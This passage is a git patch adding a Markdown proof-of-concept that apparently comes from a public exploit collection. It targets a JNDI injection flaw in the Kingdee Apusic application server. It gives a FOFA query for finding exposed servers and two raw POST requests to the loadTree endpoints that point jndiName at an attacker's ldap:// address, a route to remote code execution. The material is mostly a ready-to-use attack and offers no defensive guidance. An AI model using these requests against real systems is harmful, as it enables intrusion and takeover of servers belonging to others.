From b13e255ae488b32da0e197132c27d7f374d505a9 Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 27 Dec 2023 20:07:06 +0800
Subject: [PATCH] =?UTF-8?q?Create=20=E9=87=91=E8=9D=B6Apusic=E5=BA=94?=
 =?UTF-8?q?=E7=94=A8=E6=9C=8D=E5=8A=A1=E5=99=A8loadTree=20JNDI=E6=B3=A8?=
 =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md | 28 ++++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 金蝶Apusic应用服务器loadTree JNDI注入漏洞.md

diff --git a/金蝶Apusic应用服务器loadTree JNDI注入漏洞.md b/金蝶Apusic应用服务器loadTree JNDI注入漏洞.md
new file mode 100644
index 0000000..e710620
--- /dev/null
+++ b/金蝶Apusic应用服务器loadTree JNDI注入漏洞.md	
@@ -0,0 +1,28 @@
+## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
+
+## fofa
+```
+app="Apusic应用服务器"
+```
+
+## poc
+```
+POST /appmonitor/protect/jndi/loadTree HTTP/1.1
+host:127.0.0.1
+
+jndiName==ldap://地址
+
+POST /admin/protect/jndi/loadTree HTTP/1.1
+host:127.0.0.1
+
+jndiName==ldap://地址
+```
+
+![a519acd405e2e60c00108378f8410c8d](https://github.com/wy876/POC/assets/139549762/faa32ae9-f7b0-4a76-9990-74635d28bd2f)
+
+![1dc3f827f335c01618f9dd9c4b39832b](https://github.com/wy876/POC/assets/139549762/6eff9f3b-df75-4008-b713-db61a32739bd)
+
+![584c726b09f954433d5c3248ac5c1368](https://github.com/wy876/POC/assets/139549762/dfe99f4f-d6eb-4869-a2f8-59d792d9dac4)
+
+##漏洞来源
+- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw